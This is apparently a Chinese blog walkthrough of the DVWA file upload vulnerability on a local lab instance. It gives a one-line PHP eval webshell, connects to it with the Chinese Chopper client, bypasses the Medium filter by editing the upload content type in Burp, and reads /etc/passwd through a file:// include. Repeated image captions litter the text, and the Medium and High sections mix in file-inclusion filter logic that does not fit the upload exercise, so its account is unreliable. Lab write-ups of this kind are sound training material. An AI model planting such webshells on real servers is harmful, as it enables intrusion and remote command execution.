Low

没有进行任何过滤
DVWA 之文件上传漏洞
首相,上传一个phpinfo.php,其内代码如下:

<?php phpinfo(); ?>

上传路径:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php
然后访问
DVWA 之文件上传漏洞
首先,写好

说明存在上传和执行漏洞

上传一句话木马:

<?php @eval($_POST[“hack”]); ?>

保存为hack.php
然后上传
DVWA 之文件上传漏洞
找到文件上传目录

http://127.0.0.1/DVWA-1.9/hackable/uploads/hack.php

可以直接用hackbar这个插件,上传命令,爆出信息
DVWA 之文件上传漏洞
使用菜刀连接
DVWA 之文件上传漏洞
DVWA 之文件上传漏洞
成功

Medium

有过滤
DVWA 之文件上传漏洞
使用str_replace函数是极其不安全的,因为可以使用双写绕过替换规则。
同时,因为替换的只是“…/”、“…\”,所以对采用绝对路径的方式包含文件是不会受到任何限制的。
可以先在上传一个
此题要求,需要上传 .png或 .jpeg格式文件
因此,我们想到可以更改文件类型,然后上传
直接hack.php扩展名改为hack.png,然后上传,
DVWA 之文件上传漏洞
可以上传成功,
使用菜刀连接
DVWA 之文件上传漏洞
连接不上
制作图片码上传,同样如此
那么,可以使用burp抓包修改文件类型看看
DVWA 之文件上传漏洞DVWA 之文件上传漏洞
成功

High

其过滤内容为
DVWA 之文件上传漏洞
这个if语句的意思是如果page中不含有file并且page不等于include.php服务器才不会去包含相应的文件。两个条件只要不满足其中之一就可以,要么page等于include.php,要么page含有file。用file://流访问本地文件系统

http://127.0.0.1/DVWA-1.9/vulnerabilities/fi/?page=file:///etc/passwd
DVWA 之文件上传漏洞
说明存在命令执行
上菜刀,结果发现无聊是如何,jar版本的死活连不上,使用windows .exe版本的可以,我也懵逼
DVWA 之文件上传漏洞
DVWA 之文件上传漏洞

相关文章: